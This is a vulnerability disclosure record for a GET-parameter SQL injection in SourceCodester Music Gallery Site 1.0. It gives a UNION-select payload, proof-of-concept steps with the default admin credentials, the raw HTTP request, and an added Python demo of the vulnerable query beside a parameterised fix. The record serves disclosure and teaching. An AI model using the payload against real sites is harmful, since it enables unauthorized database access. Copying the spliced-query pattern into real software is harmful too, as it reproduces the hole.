Submit #95249: SourceCodester Music Gallery Site 1.0 : GET Request based sql injection at endpoint /admin/?page=user/manage

Title: SourceCodester Music Gallery Site 1.0 : GET Request based sql injection at endpoint /admin/?page=user/manage
Description:

## Vendor Homepage: https://www.sourcecodester.com
## Software Link: https://www.sourcecodester.com/php/16073/music-gallery-site-using-php-and-mysql-database-free-source-code.html
## Version: v 1.0
## Vulnerable URL: /php-music/admin/?page=user/manage_user&id=
## Payload: /php-music/admin/?page=user/manage_user&id=3%27+and+false+union+select+1,version(),@@datadir,4,5,6,7,8,9,10,11--+-
## Affected page: On the page "/admin?page=user/manage_user&id=", the parameter "id" is vulnerable to SQL Injection
## Description: In Music Gallery Site, after logging in as admin, under the user list tab: by updating the user list and intercepting the request upon clicking on view, the GET request "id" parameter is vulnerable to SQL Injection.
## Proof of concept

1. Click on the admin panel and log in with the credentials. The admin credentials are username: admin & password: admin123
2. Browse to the users list.
3. Click on actions and the edit option.
4. Intercept the traffic through Burp and get the actual URL.
5. Add the payload "%27+and+false+union+select+1,version(),@@datadir,4,5,6,7,8,9,10,11--+-" to the "id" parameter.

Request
---------

```http
GET /php-music/admin/?page=user/manage_user&id=3%27+and+false+union+select+1,version(),@@datadir,4,5,6,7,8,9,10,11--+- HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://localhost/php-music/admin/?page=user/list
Cookie: PHPSESSID=pkk15gn7r4j3nrksvms44fd15t
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
```
User: Anonymous User
Submission: 27.02.2023 11:06 (3 years ago)
Moderation: 27.02.2023 11:43 (37 minutes later)
Status: Accepted
VulDB entry: 221820 [SourceCodester Music Gallery Site 1.0 /admin/?page=user/manage ID SQL Injection]
Points: 17
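The submission above gives the payload but not the query it lands in. The following is an added example, not code from the submitter or from the Music Gallery Site project, that reproduces the pattern the report implies: the decoded `id` query parameter is spliced into a quoted string comparison, so a UNION with the right column count (11 here) returns attacker-chosen values, while an integer check plus a bound parameter stops it. The 11-column `users` schema, the URL parsing, and the function names are assumptions. Because it runs against an in-memory SQLite database instead of MySQL, the payload is adapted: `sqlite_version()` stands in for `version()`, a string literal for `@@datadir`, and `1=0` for `false`; the injection shape is otherwise the same.

```python
import sqlite3
from urllib.parse import parse_qs, urlsplit

# Constructed sample schema: 11 columns, the width the submitted UNION
# payload needs. The real Music Gallery users table is not on the page,
# so these column names are assumptions.
COLUMNS = ["id", "firstname", "lastname", "username", "password", "avatar",
           "last_login", "type", "date_added", "date_updated", "status"]

# SQLite's own version string, used to check what the injected query returns.
SQLITE_VERSION = sqlite3.sqlite_version

# The report's payload, adapted for SQLite: sqlite_version() stands in for
# MySQL version(), a literal for @@datadir, and 1=0 for false.
INJECTED_URL = ("/php-music/admin/?page=user/manage_user&id=3%27+and+1%3D0+union+select+"
                "1,sqlite_version(),%27datadir%27,4,5,6,7,8,9,10,11--+-")
BENIGN_URL = "/php-music/admin/?page=user/manage_user&id=3"


def make_db():
    """In-memory stand-in for the application database with one admin row (constructed)."""
    con = sqlite3.connect(":memory:")
    # id is declared integer so that the quoted '3' in the vulnerable query
    # still matches, as it does under MySQL's implicit conversion.
    con.execute("create table users (id integer, %s)" % ", ".join(COLUMNS[1:]))
    con.execute(
        "insert into users values (3,'Admin','User','admin','<hash>',NULL,NULL,"
        "1,'2023-02-27','2023-02-27',1)")
    return con


def id_param(url):
    """Extract and URL-decode the id query parameter, as PHP's $_GET would."""
    return parse_qs(urlsplit(url).query)["id"][0]


def vulnerable_lookup(con, raw_id):
    """Splices the decoded id into the query text (the pattern the report implies)."""
    sql = "select * from users where id = '%s'" % raw_id
    return con.execute(sql).fetchall()


def hardened_lookup(con, raw_id):
    """Fix: require a non-negative integer id and bind it as a parameter."""
    if not raw_id.isdigit():
        raise ValueError("id must be an integer")
    return con.execute("select * from users where id = ?", (int(raw_id),)).fetchall()


if __name__ == "__main__":
    con = make_db()
    print(vulnerable_lookup(con, id_param(BENIGN_URL)))    # the real admin row
    print(vulnerable_lookup(con, id_param(INJECTED_URL)))  # row of attacker-chosen values
    try:
        hardened_lookup(con, id_param(INJECTED_URL))
    except ValueError as e:
        print("rejected:", e)
```

The benign URL returns the stored row from both lookups. With the injected URL, `vulnerable_lookup` builds `select * from users where id = '3' and 1=0 union select 1,sqlite_version(),'datadir',...-- -'`: the first branch matches nothing, the UNION branch supplies a full 11-column row, and the trailing `-- -` comments out the dangling quote, so the server-side version string comes back in the second column exactly as `version()` would in the reported MySQL case. `hardened_lookup` rejects the same input before it reaches the database.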
